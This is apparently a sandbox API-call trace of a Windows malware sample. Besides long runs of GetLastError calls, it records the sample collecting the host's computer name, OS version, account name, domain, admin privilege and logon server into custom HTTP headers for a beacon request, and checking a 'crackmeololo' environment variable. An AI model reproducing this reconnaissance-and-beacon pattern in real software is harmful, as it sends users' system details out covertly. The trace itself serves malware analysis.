	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] GetLastError () returned 0xcb
	[0071.806] wsprintfW (in: param_1=0x4e6a48, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0071.806] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0071.806] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0071.807] GetVersionExW (in: lpVersionInformation=0x247f31c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x247f31c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.807] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.808] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.809] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] wsprintfW (in: param_1=0x4e6a48, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0071.810] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0071.810] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.810] GetLastError () returned 0x0
	[0071.811] wsprintfW (in: param_1=0x4e6a48, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 2816") returned 16
	[0071.811] lstrlenW (lpString="X-VendorId: 2816") returned 16
	[0071.811] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 2816", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0071.811] GetCurrentProcess () returned 0xffffffff
	[0071.811] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x247f2fc | out: TokenHandle=0x247f2fc*=0x274) returned 1
	[0071.811] GetTokenInformation (in: TokenHandle=0x274, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x247f2d8 | out: TokenInformation=0x0, ReturnLength=0x247f2d8) returned 0
	[0071.811] GetLastError () returned 0x7a
	[0071.811] GetTokenInformation (in: TokenHandle=0x274, TokenInformationClass=0x1, TokenInformation=0x4e9c90, TokenInformationLength=0x24, ReturnLength=0x247f2d8 | out: TokenInformation=0x4e9c90, ReturnLength=0x247f2d8) returned 1
	[0071.811] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x4e9c98*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2e)), Name=0x4e6e60, cchName=0x247f2cc, ReferencedDomainName=0x4eaf08, cchReferencedDomainName=0x247f2cc, peUse=0x247f2c0 | out: Name="Nd9E1FYi", cchName=0x247f2cc, ReferencedDomainName="X2VS1CUM", cchReferencedDomainName=0x247f2cc, peUse=0x247f2c0) returned 1
	[0071.813] CloseHandle (hObject=0x274) returned 1
	[0071.813] CloseHandle (hObject=0xffffffff) returned 1
	[0071.813] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x247f2fc | out: bufptr=0x4efc00*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x18676fa, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x4efc97, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.975] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.976] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.977] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.978] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.979] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] wsprintfW (in: param_1=0x4e6a48, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0071.980] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0071.980] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0071.980] NetApiBufferFree (Buffer=0x4efc00) returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.980] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0071.981] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.001] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x247f1e0, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0072.002] wsprintfW (in: param_1=0x4e6a48, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0072.002] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0072.002] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
